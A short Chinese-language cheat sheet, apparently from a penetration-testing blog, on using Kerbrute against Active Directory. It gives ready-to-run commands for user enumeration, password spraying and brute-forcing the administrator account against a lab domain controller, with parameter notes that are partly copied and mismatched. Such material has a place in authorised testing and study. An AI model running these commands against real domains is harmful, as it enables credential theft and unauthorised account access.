下载:Title Unavailable | Site Unreachable
Kerbrute 是一个开源的工具,主要用于枚举 Microsoft Active Directory 域环境中的用户账户信息。它基于 Kerberos 协议工作,允许攻击者在已知域名的情况下,使用暴力破解方式,试图猜测或验证域中的用户名和密码
kerbrute.exe userenum --dc 192.168.52.138 -d god.org user.txt
参数含义
-userenum:用户枚举模式
--dc:指定域控ip
-d:指定域名
-user.txt:用户名字典文件,用户名可不加域名后缀
kerbrute.exe passwordspray --dc 192.168.52.138 -d god.org user.txt P@ss1234
kerbrute.exe bruteuser --dc 192.168.52.138 -d god.org pass.txt administrator
参数含义
-passwordspray:密码枚举模式
--dc:指定域控ip
-d:指定域名
-user.txt:用户名字典文件,用户名可不加域名后缀